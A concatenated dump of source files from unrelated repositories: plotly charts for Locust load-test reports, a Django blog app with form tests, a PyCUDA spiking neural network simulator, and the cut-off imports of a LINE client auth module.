hoverinfo='text',
xgap=3, # this
ygap=3, # and this is used to make the grid-like apperance
showscale=False,
colorscale=[
[0, '#223147'],
[0.5, '#00CC69'],
[1, '#66FA16']]
)
]
layout = go.Layout(
title='Activity Chart',
height=380,
yaxis=dict(
showline=False, showgrid=False, zeroline=False,
tickmode='array',
ticktext=['Sun', 'Sat', 'Fri', 'Thu', 'Wed', 'Tue', 'Mon'],
tickvals=[-6, -5, -4, -3, -2, -1, 0]
),
xaxis=dict(
showline=False, showgrid=False, zeroline=False,
side='top'
),
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#F2F2F2', size=11),
margin=dict(t=150, b=0, pad=5)
)
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def distributedDotPlot(self, name=None, filename=None):
if name is None or filename is None:
logging.critical(
'Invalid Usage: Please assign both key and filename.')
sys.exit(1)
df = self.reports[self.reports['Name'] == name].sort_values(
'DateTime', ascending=True, inplace=False)
keys = [
'50%',
'66%',
'75%',
'80%',
'90%',
'95%',
'98%',
'99%',
'Average response time',
'Min response time',
'Max response time'
]
data = []
for d in df['DateTime'].values:
date = d.astype('M8[ms]').astype('O')
date_for_label = date.isoformat().replace('T', ' ')
for key in keys:
if 'time' in key:
df[key.split(' ')[0].lower()] = df[key]
key = key.split(' ')[0].lower()
color = '#FF1744' if key == '99%' else '#7986CB'
data.append(go.Scatter(
x=df[df['DateTime'] == d][key],
y=[date.isoformat().replace('T', '<br>')],
text=['DateTime: ' + date_for_label + '<br>Latency: ' + str(l)
for l in df[df['DateTime'] == d][key].values],
name=key,
hoverinfo='text+name',
marker=dict(color=color)
))
layout = go.Layout(
title='Distribution of Latency',
xaxis=dict(title='Latency (ms)',
gridcolor='#2B3D59', zeroline=False),
yaxis=dict(gridcolor='#2B3D59', zeroline=False),
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#F2F2F2', size=11),
showlegend=False,
margin=dict(pad=3))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def degradationPlot(self, name=None, key=None, filename=None):
if name is None or key is None or filename is None:
logging.critical(
'Invalid Usage: Please assign name, key and filename.')
sys.exit(1)
df = self.reports[self.reports['Name'] == name]
df_new = df.assign(diff=df[key].diff().fillna(0))
text = ['DateTime: ' +
d.astype('M8[ms]').astype('O').isoformat().replace('T', ' ')
+ '<br>Degraded Latency: ' + str(r)
for d, r in zip(
df_new['DateTime'].values, df_new['diff']
)]
data = [go.Scatter(
x=df_new['DateTime'],
y=df_new['diff'],
name=name,
mode='lines+markers',
text=text,
hoverinfo='text+name'
)]
layout = go.Layout(
title=key + 'tile Latency Degradation Timeline Chart',
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(title='Latency (ms)',
gridcolor='#2B3D59', zeroline=False),
paper_bgcolor="rgba(0,0,0,0)",
plot_bgcolor="rgba(0,0,0,0)",
font=dict(color="#F2F2F2", size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
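# Minimal usage sketch (illustrative only): builds a tiny fake report frame with
# the columns documented in __init__ and renders one chart; all values and the
# output filename below are made up for demonstration.
if __name__ == '__main__':
    _demo = pd.DataFrame({
        'Name': ['Total', 'Total'],
        '# requests': [100, 120],
        '# failures': [0, 1],
        '99%': [350, 420],
        'Median response time': [120, 140],
        'Average response time': [150, 170],
        'Min response time': [30, 35],
        'Max response time': [900, 950],
        'Requests/s': [9.5, 10.2],
        'DateTime': pd.to_datetime(['2019-01-01 12:00:00', '2019-01-02 12:00:00']),
    })
    PerformanceReport(_demo).percentilePlot(key='99%', filename='99percentiles_demo.html')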
```
#### File: scripts/modules/PreProcessor.py
```python
import datetime
import logging
import pandas as pd
import os
import sys
from .processors import LocustResourceProcessor
class PreProcessor:
RESOURCES = ['LOCUST']
def __init__(self, resource, time_formatter, *args, **kwargs):
if resource not in PreProcessor.RESOURCES:
logging.critical(
'Invalid Usage: Please assign a resource defined in '
+ 'PreProcessor.RESOURCES.')
sys.exit(1)
if resource == 'LOCUST':
if 'distribution_filename' in kwargs \
and 'requests_filename' in kwargs:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor(
distribution_filename=kwargs['distribution_filename'],
requests_filename=kwargs['requests_filename'])
elif 'distribution_filename' in kwargs:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor(
distribution_filename=kwargs['distribution_filename'])
elif 'requests_filename' in kwargs:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor(
requests_filename=kwargs['requests_filename'])
else:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor()
self.time_formatter = time_formatter
def process(self, reports_path):
"""Performance Report as pandas DataFrame.
Args:
reports_dir: directory having directory \
which includes locust reports.
Returns:
reports [pandas.DataFrame]: Having performance test reports and \
following columns.
1. Name: test target.
2. # requests: number of requests.
3. 99%: 99%tile Latency. any %tile Latency is available \
because you have to assign key when plotting charts.
4. Median response time: 50%tile Latency.
5. Average response time: ditto.
6. Min response time: ditto.
            7. Max response time: ditto.
            8. # failures: number of failures.
9. Requests/s: requests per second.
10: DateTime [pandas.TimeStamp]: date executed test.
"""
report_dirs = [f for f in os.listdir(reports_path) if os.path.isdir(
os.path.join(reports_path, f))]
reports_df = None
for report_dir in report_dirs:
tmp_df = self._process(reports_path, report_dir)
if reports_df is None:
reports_df = tmp_df
else:
reports_df = pd.concat([reports_df, tmp_df], ignore_index=True)
return reports_df
def _process(self, reports_path, report_dir):
year, month, day, hour, minute, second = self.time_formatter.format(
report_dir)
report_df = self.resource_processor.process(reports_path + report_dir)
report_df['DateTime'] = datetime.datetime(
year=year, month=month, day=day,
hour=hour, minute=minute, second=second)
report_df.sort_values('DateTime', ascending=True, inplace=True)
return report_df
```
#### File: python/scripts/PerformanceVisualizer.py
```python
from modules import PerformanceReport, PreProcessor, TimeFormatter
import os
class PerformanceVisualizer:
def __init__(self, preprocessor):
self.preprocessor = preprocessor
self.keys = [
'50%',
'66%',
'75%',
'80%',
'90%',
'95%',
'98%',
'99%',
'Average response time',
'Min response time',
'Max response time'
]
def visualize(self, path):
reports = self.preprocessor.process(path)
static_dir = os.path.join(
os.path.dirname(__file__),
'../../javascript/static')
if not os.path.isdir(static_dir + '/shared'):
os.makedirs(static_dir + '/shared')
performance_report = PerformanceReport.PerformanceReport(reports)
performance_report.percentilePlot(
key='99%',
filename=static_dir +
'/shared/99percentiles.html')
performance_report.rpsTimelineChart(
filename=static_dir
+ '/shared/rps-timeline-chart.html')
performance_report.requestsTimelineChart(
key='# requests',
title='# of requests',
filename=static_dir +
'/shared/num-of-requests.html')
performance_report.requestsTimelineChart(
key='# failures',
title='# of failures',
filename=static_dir +
'/shared/num-of-errors.html')
performance_report.activityChart(
filename=static_dir +
'/shared/activity-chart.html')
uniq_reports = sorted(reports['Name'].unique())
for uniq_report in uniq_reports:
additional_path = 'total/' if uniq_report == 'Total' \
else ''.join(
uniq_report.split(' ')).lower() + '/'
plot_path = static_dir + '/' + additional_path
if not os.path.isdir(plot_path):
os.makedirs(plot_path)
performance_report.distributedDotPlot(
name=uniq_report,
filename=plot_path
+ 'distributed-dot-plot.html')
performance_report.rpsTimelineChart(
name=uniq_report,
filename=plot_path
+ 'rps-timeline-chart.html')
for key in self.keys:
prefix = key.split(' ')[0].lower(
) if 'time' in key else key[:2] + 'percentile'
performance_report.percentilePlot(
name=uniq_report,
key=key,
filename=plot_path
+ prefix + '-timeline-chart.html')
performance_report.degradationPlot(
name=uniq_report,
key=key,
filename=plot_path
+ prefix + '-degradation-timeline-chart.html')
time_formatter = TimeFormatter.TimeFormatter('YYYYMMDD_HHMMSS1')
visualizer = PerformanceVisualizer(
PreProcessor.PreProcessor('LOCUST', time_formatter))
visualizer.visualize(
os.path.join(os.path.dirname(__file__), '../resources/reports/'))
``` |
{
"source": "4madeuz/django_example",
"score": 2
} |
#### File: core/context_processors/year.py
```python
def year(request):
"""Добавляет переменную с текущим годом."""
return {
'year': '{% now "Y" %}',
}
# without the year function existing in at least some form, the tests break,
# though I don't actually use it in footer.html
```
#### File: yatube/posts/models.py
```python
from django.contrib.auth import get_user_model
from django.db import models
from django.contrib import admin
import datetime
from django.utils import timezone
User = get_user_model()
class Group(models.Model):
title = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
description = models.TextField()
def __str__(self):
return self.title
class Post(models.Model):
text = models.TextField()
pub_date = models.DateTimeField(auto_now_add=True)
group = models.ForeignKey(Group, on_delete=models.SET_NULL,
blank=True, null=True, related_name='posts')
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='posts',
)
image = models.ImageField(
'Картинка',
upload_to='posts/',
blank=True
)
class Meta:
ordering = ['-pub_date']
def __str__(self):
return self.text[:15]
class Comment(models.Model):
text = models.TextField()
created = models.DateTimeField(auto_now_add=True)
post = models.ForeignKey(
Post,
on_delete=models.CASCADE,
related_name='comments')
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='comments')
class Follow(models.Model):
user = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='follower',)
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='following',
)
class Meta:
db_table = 'app_version'
constraints = [
models.UniqueConstraint(
fields=['user', 'author'], name='unique_following')
]
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
@admin.display(
boolean=True,
ordering='pub_date',
description='Published recently?',
)
def was_published_recently(self):
now = timezone.now()
return now - datetime.timedelta(days=1) <= self.pub_date <= now
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
```
#### File: posts/tests/test_froms.py
```python
from django.contrib.auth import get_user_model
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import Client, TestCase
from django.urls import reverse
from posts.forms import PostForm
from posts.models import Comment, Group, Post
User = get_user_model()
class PostsFormsTests(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.group = Group.objects.create(
title='Тестовый заголовок',
description='Тестовое описание',
slug='test-slug'
)
cls.author = User.objects.create_user(username='HasNoName')
cls.post = Post.objects.create(
text='Пост',
author=cls.author,
group=cls.group,
)
cls.form = PostForm()
def setUp(self):
self.user = User.objects.get(username=PostsFormsTests.author.username)
self.authorized_client = Client()
self.authorized_client.force_login(self.user)
def test_create_post(self):
        '''Creating a post adds a record to the database'''
post_count = Post.objects.count()
small_gif = (
b'\x47\x49\x46\x38\x39\x61\x02\x00'
b'\x01\x00\x80\x00\x00\x00\x00\x00'
b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
b'\x00\x00\x00\x2C\x00\x00\x00\x00'
b'\x02\x00\x01\x00\x00\x02\x02\x0C'
b'\x0A\x00\x3B'
)
uploaded = SimpleUploadedFile(
name='small.gif',
content=small_gif,
content_type='image/gif'
)
form_data = {
'text': 'NewPost',
'group': PostsFormsTests.group.id,
'image': uploaded
}
response = self.authorized_client.post(
reverse('posts:post_create'),
data=form_data,
follow=True
)
self.assertRedirects(response,
reverse('posts:profile',
kwargs={'username':
PostsFormsTests.author.username}))
self.assertEqual(Post.objects.count(), post_count + 1)
self.assertTrue(
Post.objects.filter(
text=form_data['text'],
group=PostsFormsTests.group
).exists()
)
def test_post_edit(self):
post_count = Post.objects.count()
form_data = {
'text': 'NewPost'
}
response = self.authorized_client.post(
reverse('posts:post_edit', args=f'{PostsFormsTests.post.id}'),
data=form_data,
follow=True
)
self.assertRedirects(response,
reverse('posts:post_detail',
kwargs={'post_id':
PostsFormsTests.post.id}))
self.assertEqual(Post.objects.count(), post_count)
self.assertTrue(
Post.objects.filter(
text=form_data['text'],
).exists()
)
def test_comment(self):
form_data = {
'text': 'NewComment'
}
comment_count = Comment.objects.count()
response = self.authorized_client.post(
reverse('posts:add_comment', args=f'{PostsFormsTests.post.id}'),
data=form_data,
follow=True
)
self.assertEqual(Comment.objects.count(), comment_count + 1)
self.assertContains(response, 'NewComment')
``` |
{
"source": "4martin/snn-simulator-example",
"score": 3
} |
#### File: 4martin/snn-simulator-example/snn-simulator.py
```python
import pycuda.driver as cuda
import pycuda.autoinit
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
from scipy.sparse import *
import numpy
import random
import sys
INPUT_VECTOR_SIZE = 2 # inputs of one neuron
SYNAPSES_VECTOR_SIZE = 2 # destination (outgoing) connections of one neuron
NEURONS_IN_GROUP = 4 # number of neurons in a group
MAX_THRESHOLD = 1 # threshold for spiking
GROUPS_AMOUNT = 2 # number of neurons groups (correspond to blocks on the GPU)
def show_configuration():
print "###################################################"
print "# for each neuron:"
print "# max number of inputs: %d" % INPUT_VECTOR_SIZE
print "# max number of synapses: %d" % SYNAPSES_VECTOR_SIZE
print "#"
print "# neurons in a group: %d" % NEURONS_IN_GROUP
print "# number of groups: %d" % (GROUPS_AMOUNT)
print "# total neurons: %d" % (NEURONS_IN_GROUP*GROUPS_AMOUNT)
print "# max threshold: %d" % MAX_THRESHOLD
print "###################################################"
def debug(title, var):
print title+':'
print var
print "###################################################"
def divide_network_to_groups():
# NOT IMPLEMENTED
# divide to groups with minimal inter-group connections
# under maximum group size restriction (block size in the GPU)
# It is a graph-cut problem - graph partitioning optimizing edges cut to minimum
# while satisfying additional conditions.
#
# ref:
# http://romainbrette.fr/WordPress3/wp-content/uploads/2014/06/BretteGoodman2012.pdf
#
# instead - an example network with GROUPS_AMOUNT dense groups and minor inter-group connection is built:
# create all groups
GI=NEURONS_IN_GROUP*INPUT_VECTOR_SIZE # group inputs
GS=NEURONS_IN_GROUP*SYNAPSES_VECTOR_SIZE # group synapses
    g = numpy.zeros((GI*GROUPS_AMOUNT,GS*GROUPS_AMOUNT)) # large (sparse) matrix
g = g.astype(numpy.float32)
# weights: between 0.0-1.0 for each of inputs
# indices:
# (rows) input#, (columns) synapse#
# inside group connections:
for i in range(GROUPS_AMOUNT):
        g[0+i*GI,6+i*GS]=0.2 # in group #i, synapse #0 of neuron #3 connects to input #0 of neuron #0 with weight 0.2
g[1+i*GI,2+i*GS]=0.6
g[2+i*GI,7+i*GS]=0.5
g[3+i*GI,4+i*GS]=0.7
g[4+i*GI,0+i*GS]=0.4
g[6+i*GI,5+i*GS]=0.8
#g[5+i*GI,1+i*GS]=0.7123
# inter-group connections
# group 1 depends on group 0
    g[7+1*GI,3+0*GS]=0.9 # synapse #1 of neuron #1 in group #0 connects to input #1 of neuron #3 in group #1
numpy.set_printoptions(linewidth=10000)
print g
return g
def get_weights_graph():
# Assuming that the connection matrix is sparse, the data
# structure used is compressed Sparse Row/Column matrix.
    # The CSR format's row-wise efficiency is used for the weights to target neurons,
# to achieve coalesced memory access during spike distribution.
# http://homepages.cwi.nl/~sbohte/publication/slazynski2012network.pdf
#
    # A dense representation has NEURONS_IN_GROUP*SYNAPSES_VECTOR_SIZE
    # columns and NEURONS_IN_GROUP*INPUT_VECTOR_SIZE rows, each cell stating
    # the corresponding weight or a zero for no connection. Each neuron spans over
# SYNAPSES_VECTOR_SIZE columns and INPUT_VECTOR_SIZE rows.
# Groups of neurons (more dense connections) are located in neighbour indices, so
# they land in the same block letting them run for longer periods while using
# shared memory, until they need to connect to another group which runs on
# a different block.
#
# neuron synapses X
# ----------------------------------------- >
# |██████| | | | |
# |██████| | | | |
# |██████| | | | |
# |██████| | | | |
# |------- | | | |
# |--------|--------|--------|--------|----
# | . |███| | | . |
# n | |---- | | |
# e | | | | |
# u | | | | |
# r |--------|--------|--------|--------|----
# o | | . |██████| | |
# n | | |██████| | . |
# | | |██████| | |
# i | | |------- | |
# n |--------|--------|--------|--------|----
# p | . | | |█████| |
# u | | | |█████| |
# t | | | |------ |
# s | | | | |
# |--------|--------|--------|--------|----
# Y v
#
# This is a Weights matrix (W):
# =============================
# Each of the large squares (16) represents synapses of neurons group (on axis X) connecting
# to inputs of neurons group (on axis Y).
# On the diagonal there are (smaller) squares representing (dense) connections inside
# a group. The dots on other squares represent inter-group connections.
# The matrix is split into vertical slices, each containing neurons with synapses from one group.
# Each group runs later on a separate GPU block.
# When a spike goes to a neuron in another block there is a mechanism that updates the required block.
#
# The CSR representation of the above matrix is:
# A - an array of all non-zero weights (right to left, top down)
# B - an array where value in place i is the A-index of the first non-zero number on row i of W.
# The size |A| is added to B.
# C - an array of the column indices in W of each of A items.
#
# A block that has dependency needs to get periodic approvals until which clock step it
# may run. A bidirectional dependency between blocks can be solved by running each time
# during some fixed clock slices (e.g. 1000 clocks). If no spikes were done, just continue
# with the next slice. If a spike was emitted, cut the slice to 1/2 and repeat calculation
# on both blocks. Update the corresponding spike as needed.
#
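# A small worked example of the CSC arrays used below (illustrative only, not
# part of the simulator): for the matrix
#   M = [[0.0, 0.2],
#        [0.6, 0.0]]
# scipy's csc_matrix stores the non-zeros column by column:
#   from scipy.sparse import csc_matrix
#   m = csc_matrix([[0.0, 0.2], [0.6, 0.0]])
#   m.data    # A = [0.6, 0.2]  non-zero weights, column 0 first
#   m.indptr  # B = [0, 1, 2]   A-index where each column starts, plus |A|
#   m.indices # C = [1, 0]      row index of each entry of A
#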
groups=divide_network_to_groups()
CSC_groups=[]
CSC_vectors_lengths=numpy.zeros(3*GROUPS_AMOUNT, dtype=numpy.float32)
CSC_vectors_start_index=numpy.zeros(3*GROUPS_AMOUNT, dtype=numpy.float32)
# split large matrix to GROUPS_AMOUNT group slices
for i in range(GROUPS_AMOUNT):
g_slice=groups[:,i*SYNAPSES_VECTOR_SIZE*NEURONS_IN_GROUP:(i+1)*SYNAPSES_VECTOR_SIZE*NEURONS_IN_GROUP]
#print "slice ...."
#print g_slice
m=csc_matrix(g_slice)
A=m.data
B=m.indptr
C=m.indices
#print A,B,C
# keep vector (of CSC representation for each group) lengths
CSC_vectors_lengths[0+i*3]=len(A)
CSC_vectors_lengths[1+i*3]=len(B)
CSC_vectors_lengths[2+i*3]=len(C)
#print "CSC_vectors_lengths ", CSC_vectors_lengths
if i<(GROUPS_AMOUNT-1):
# check on which location each vector begins
# next vector begins at the previous location + its vector length
# this is needed for in-kernel vectors usage optimization
CSC_vectors_start_index[0+(i+1)*3]=CSC_vectors_start_index[0+i*3]+len(A)
CSC_vectors_start_index[1+(i+1)*3]=CSC_vectors_start_index[1+i*3]+len(B)
CSC_vectors_start_index[2+(i+1)*3]=CSC_vectors_start_index[2+i*3]+len(C)
#print "CSC_vectors_start_index ", CSC_vectors_start_index
CSC_groups.append([A,B,C])
return CSC_groups,CSC_vectors_start_index,CSC_vectors_lengths
def run():
show_configuration()
# get network
CSC_groups,CSC_vectors_start_index,CSC_vectors_lengths=get_weights_graph()
# concat all CSC vectors to simplify load to GPU
# calculate total lengths
concat_vectors_lengths=numpy.zeros(3, dtype=numpy.float32)
j=0
for i in CSC_vectors_lengths:
concat_vectors_lengths[j%3]+=CSC_vectors_lengths[j] # calculate total lengths for all A,B,C
j+=1
# allocate concatenated vectors
ccA=numpy.zeros(concat_vectors_lengths[0], dtype=numpy.float32)
ccB=numpy.zeros(concat_vectors_lengths[1], dtype=numpy.float32)
ccC=numpy.zeros(concat_vectors_lengths[2], dtype=numpy.float32)
# concating all A in to ccA, B to ccB and C to ccC
ccA_counter=0
ccB_counter=0
ccC_counter=0
for i in range(GROUPS_AMOUNT):
A,B,C = CSC_groups[i]
for j in range(CSC_vectors_lengths[0+i*3]): # run over each A length
ccA[j+ccA_counter]=A[j]
ccA_counter=j+1
for j in range(CSC_vectors_lengths[1+i*3]): # run over each B length
ccB[j+ccB_counter]=B[j]
ccB_counter=j+1
#print "range: ",CSC_vectors_lengths[2+i*3]
for j in range(CSC_vectors_lengths[2+i*3]): # run over each C length
#print "ccC index is ", j, " writing ",C[j]
ccC[j+ccC_counter]=C[j]
ccC_counter=j+1
#print "==============> ",concat_vectors_lengths
#print "==============> ",ccA
#print "==============> ",ccC
# more data structures:
# =====================
# Inputs - array. Size according to block size limit from weight matrix.
# Threshold - array per neuron (small).
# Action Potential (AC) - array. Size according to block size limit from weight matrix.
# Fired - array per neuron (small).
# Cross block dependency - matrix per block (small).
# inputs: each is 0 or the corresponding weight
# use one vector for inputs of a whole neurons group
X = numpy.array([0.2,0,0.5,0.7,0.4,0,0,0.9,0.2,0,0.5,0.7,0.4,0,0,0.9])
#X = numpy.array([1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1])
X = X.astype(numpy.float32)
# threshold
TH = MAX_THRESHOLD*numpy.random.rand(NEURONS_IN_GROUP*GROUPS_AMOUNT)
#TH = MAX_THRESHOLD*numpy.zeros(NEURONS_IN_GROUP*GROUPS_AMOUNT)
TH = TH.astype(numpy.float32)
# to gpu
# currently only one group is loaded
# to load the full ndarray, the following can be used:
# http://documen.tician.de/pycuda/array.html#pycuda.gpuarray.GPUArray.set
ccA_gpu = gpuarray.to_gpu(ccA)
ccB_gpu = gpuarray.to_gpu(ccB)
ccC_gpu = gpuarray.to_gpu(ccC)
X_gpu = gpuarray.to_gpu(X)
TH_gpu = gpuarray.to_gpu(TH)
# CSC_vectors_start_index and CSC_vectors_lengths of CSC vectors
CSC_vectors_lengths_gpu = gpuarray.to_gpu(CSC_vectors_lengths)
CSC_vectors_start_index_gpu = gpuarray.to_gpu(CSC_vectors_start_index)
# prepare vectors for results:
# weighted sum
AC_gpu = gpuarray.zeros(NEURONS_IN_GROUP*GROUPS_AMOUNT, dtype=numpy.float32)
# fired
fired_gpu = gpuarray.zeros(NEURONS_IN_GROUP*GROUPS_AMOUNT, dtype=numpy.float32)
################################################################
#
# declare kernel
#
################################################################
kernel_code_template = """
#include <stdio.h>
#define INPUT_VECTOR_SIZE 2
#define SYNAPSES_VECTOR_SIZE 2
#define NEURONS_IN_GROUP 4
#define GROUPS_AMOUNT 2
#define INPUTS_PER_GROUP (INPUT_VECTOR_SIZE*NEURONS_IN_GROUP)
#define GROUP_NUMBER_MASK (INPUTS_PER_GROUP*(GROUPS_AMOUNT-1))
#define MAX_GROUP_UPDATE_QUEUE_LEN 8 // must be 2^n to work with modulo optimization (see atomicAnd below)
#define PERIODIC_UPDATE_CYCLES 4
#define UPDATE_PERIODS 1
// management of inter-group updates on shared memory
__device__ struct update_group_entry {
int clock; // Note: add __padding for alignment if using 64 bit float
int input;
float weight;
} group_updates_queue[GROUPS_AMOUNT][MAX_GROUP_UPDATE_QUEUE_LEN];
__device__ int first_on_queue[GROUPS_AMOUNT]; // mod MAX_GROUP_UPDATE_QUEUE_LEN
__device__ int already_on_queue[GROUPS_AMOUNT];
volatile __device__ int safe_clock[GROUPS_AMOUNT];
/*
* # neural state update + spike generation:
* # =======================================
* # each input has one of 2 values - 0 or the corresponding weight.
* # each group/block verifies that it is safe to run for the current clock.
* # safe means that if there is dependency on another group - the other block signals updates for inputs
* # on current block at certain clocks, or alternatively no updates until some recent clock.
* # block run on all these inputs of neurons in current block, compare to threshold, and update fired
* # array. When done, zero all inputs (assumption of 1 clock decay of the spike).
*/
__device__ void sigma(float *X, float *AC, float *TH, float *fired, uint clock)
{
const uint tx = threadIdx.x;
const uint bx = blockIdx.x;
const uint vec_num = tx/INPUT_VECTOR_SIZE+bx*NEURONS_IN_GROUP;
int first_index;
// busy loop if no "safe" clock in the future
if(bx==1){ // FIXME: condition should be "is dependent group?"
if (clock>safe_clock[bx]) {
printf("busy loop on block %d clock %d before safe %d\\n", bx, clock, safe_clock[bx]);
} else {
printf("skip busy as clock %d before safe %d\\n", clock, safe_clock[bx]);
}
while(clock>safe_clock[bx]) {
// busy wait
// maybe some variation on _gpu_sync() could be used here.
// http://fulmanski.pl/zajecia/cuda/zajecia_20122013/materialy/TR_GPU_synchronization.pdf
printf("%d, ",clock);
}
}
if (already_on_queue[bx] > 0) { // must update inputs due to spikes from other groups
printf("handling queue for group %d length of %d at clock %d\\n", bx, already_on_queue[bx], clock);
first_index=first_on_queue[bx];
printf("on queue index %d, clock %d, input %d, weight %f\\n", first_index, group_updates_queue[bx][first_index].clock, group_updates_queue[bx][first_index].input, group_updates_queue[bx][first_index].weight);
if(clock==group_updates_queue[bx][first_index].clock) {
// update the input using the values from the queue
X[group_updates_queue[bx][first_index].input]=group_updates_queue[bx][first_index].weight;
}
atomicAdd(&already_on_queue[bx],-1); // FIXME: take care with parallel changes (consider A Parallel Counter Class - http://www.drdobbs.com/parallel/atomic-operations-and-low-wait-algorithm/240160177)
atomicAdd(&first_on_queue[bx],1);
atomicAnd(&first_on_queue[bx],MAX_GROUP_UPDATE_QUEUE_LEN-1); // next on cyclic buffer - optimization of modulo (no problem after previous atomic add, since during the transition
// between MAX_GROUP_UPDATE_QUEUE_LEN-1 to MAX_GROUP_UPDATE_QUEUE_LEN, these are orthogonal bits)
}
if (tx<INPUT_VECTOR_SIZE*NEURONS_IN_GROUP) {
atomicAdd(&AC[vec_num], X[tx+bx*INPUT_VECTOR_SIZE]);
if(AC[vec_num]>=TH[vec_num]) {
fired[vec_num]=1.0; // it is written over INPUT_VECTOR_SIZE times
printf("fired[%d]=%f on clock %d\\n", vec_num, fired[vec_num], clock);
} else {
//printf("under TH of fired[%d]=%f\\n", vec_num, fired[vec_num]);
}
}
}
__device__ void zero(float *x)
{
const uint tx = blockIdx.x *blockDim.x + threadIdx.x;
if (tx<INPUT_VECTOR_SIZE*NEURONS_IN_GROUP) {
x[tx]=0;
}
}
/*
* # spike distribution:
* # ===================
* # inside a block, run on the weights with a coalesced memory access, multiply by corresponding
* # fired array (the indices derived from C by [floor of] division to INPUT_VECTOR_SIZE). Update the
* # corresponding input (the indices are in C). When done, zero all fired array (assumption of
* # 1 clock decay of the spike).
* # Note: An attempt to update another group (block) is done using group_updates_queue mechanism.
*/
__device__ void update_inputs(float *ccA, float *ccC, float *fired, float *X, float *CSC_vectors_start_index, float *CSC_vectors_lengths, uint clock)
{
const uint tx = threadIdx.x;
const uint bx = blockIdx.x;
int a_len_index=0+bx*3;
int c_len_index=2+bx*3;
int a_index=tx+CSC_vectors_start_index[a_len_index];
int c_index=tx+CSC_vectors_start_index[c_len_index];
int input_index = ccC[c_index];
int fired_index = input_index/SYNAPSES_VECTOR_SIZE; // neuron number
int input_group=(input_index&GROUP_NUMBER_MASK)/INPUTS_PER_GROUP; // to which block goes the index
//printf("BLOCK %d\\n", bx);
if(tx<CSC_vectors_lengths[a_len_index]) { // running over (the relevant subarray of) A
//printf("block %d, input_index %d, MASK %x, GROUP NUM %d\\n", bx, input_index, GROUP_NUMBER_MASK, (input_index&GROUP_NUMBER_MASK)/INPUTS_PER_GROUP);
if(input_group==bx) { // updating current group
X[input_index] = ccA[a_index]*fired[fired_index];
printf("normal update in block %d for %d with %f\\n",bx, input_index, ccA[a_index]*fired[fired_index]);
} else { // must update a different group
if(fired[fired_index]>0.0) { // ignore on non fired neuron
printf("external update in block %d at clock %d for input %d with fired_index %d fire %f tell block %d\\n",bx, clock, input_index, fired_index, fired[fired_index], input_group);
if(already_on_queue[input_group]<MAX_GROUP_UPDATE_QUEUE_LEN) {
group_updates_queue[input_group][first_on_queue[input_group]].clock=clock;
group_updates_queue[input_group][first_on_queue[input_group]].input=input_index;
group_updates_queue[input_group][first_on_queue[input_group]].weight=ccA[a_index]*fired[fired_index];
already_on_queue[input_group]+=1;
} else {
printf("QUEUE TOO LONG on group %d! Spike will be ignored!!!\\n", input_group);
}
}
}
printf("tx %d fired[%d] %f ccA %f X %f\\n", tx, fired_index, fired[fired_index], ccA[a_index], X[input_index]);
}
}
__global__ void cycle(float *X, float *ccA, float *ccB, float * ccC, float *AC, float *TH, float *fired, float *CSC_vectors_start_index, float *CSC_vectors_lengths)
{
uint clock;
uint periods;
//if(blockIdx.x==0) {
// return;
//}
for(periods=0;periods<UPDATE_PERIODS;periods++) {
for(clock=0+periods*PERIODIC_UPDATE_CYCLES;clock<PERIODIC_UPDATE_CYCLES*(periods+1);clock++) {
zero(fired);
zero(AC);
__syncthreads();
sigma(X, AC, TH, fired, clock);
__syncthreads();
zero(X);
__syncthreads();
update_inputs(ccA, ccC, fired, X, CSC_vectors_start_index, CSC_vectors_lengths, clock);
__syncthreads();
}
//printf("PERIOD %d\\n", periods);
if(blockIdx.x==0){ // FIXME: condition should be "is non-dependent group?"
if (already_on_queue[1] == 0) {
safe_clock[1]=clock; // FIXME: atomic? clock-1?
printf("update clean SAFE to clock %d\\n", safe_clock[1]);
} else {
safe_clock[1]=group_updates_queue[1][first_on_queue[1]].clock; // FIXME: atomic? clock-1?
printf("update dirty SAFE to clock %d\\n", safe_clock[1]);
}
}
}
}
"""
kernel_code = kernel_code_template
mod = SourceModule(kernel_code)
################################################################
#
# debug before running kernel
#
################################################################
debug("inputs",X)
debug("thresholds", TH_gpu.get())
################################################################
#
# running kernel
#
################################################################
cycle = mod.get_function("cycle")
cycle(X_gpu, ccA_gpu, ccB_gpu, ccC_gpu, AC_gpu, TH_gpu, fired_gpu, CSC_vectors_start_index_gpu, CSC_vectors_lengths_gpu, block=(SYNAPSES_VECTOR_SIZE*NEURONS_IN_GROUP,1,1), grid=(GROUPS_AMOUNT,1))
################################################################
#
# debug after running kernel
#
################################################################
debug("last fired neurons", fired_gpu.get())
debug("inputs after running network", X_gpu.get())
if __name__ == "__main__":
run()
#
# improvement options to examine:
# ===============================
# parallel sum during AC calculation (complexity drops from O(n) to O(log n)), but maybe for
# such small input amounts per neuron it doesn't make sense.
#
# loop unrolling.
``` |
{
"source": "4masaka/AsyncLine",
"score": 2
} |
#### File: AsyncLine/AsyncLine/auth.py
```python
import os, sys
import hmac
import time
import base64
import asyncio
import hashlib
import rsa
import requests
from . import config
from . import log
